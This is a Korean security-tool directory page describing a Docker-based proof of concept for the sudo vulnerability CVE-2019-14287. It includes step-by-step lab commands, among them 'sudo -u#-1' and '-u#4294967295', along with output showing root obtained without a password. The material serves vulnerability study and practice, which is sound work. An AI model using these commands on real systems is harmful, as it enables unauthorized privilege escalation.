Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
poc-cve-2019-14287 — Docker 기반 PoC로, Runas 사용자 제한 우회를 통한 CVE-2019-14287 sudo 권한 상승을 시연하며, 단계별 재현 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/lemonadern/poc-cve-2019-14287
Privilege EscalationContainer SecurityVulnerability AnalysisExploitationLearning & EducationLabs & Practice
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

Docker 기반 PoC로, Runas 사용자 제한 우회를 통한 CVE-2019-14287 sudo 권한 상승을 시연하며, 단계별 재현 지침을 포함합니다.

저장소 보기
141년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PoC of CVE-2019-14287

개요

sudo 취약점(CVE-2019-14287)을 Docker 컨테이너에서 재현하는 샘플입니다.

실습 절차

  1. docker compose up -d로 컨테이너를 시작합니다.
  2. docker exec -it vulnerable_sudo_app bash로 컨테이너에 들어갑니다.
  3. whoami 및 id 명령을 실행하여 자신이 일반 사용자(root가 아님)인지 확인합니다.
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. sudo -u#0 whoami 및 sudo -u#0 id -u가 실행되지 않는지 확인합니다.
    • uid(-u 옵션)에 0(root)을 지정하여 실행합니다.
    • 비밀번호를 요구하지만 비밀번호를 모르므로 실행할 수 없습니다.
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. sudo -u#-1 whoami 및 sudo -u#-1 id -u를 실행하여 인증 없이 root로 명령을 실행할 수 있는지 확인합니다(취약점 재현).
    • -u#4294967295로도 동일하게 할 수 있습니다.
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

참고

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudoの脆弱性(CVE-2019-14287)についてまとめてみた - Qiita
도구 다운로드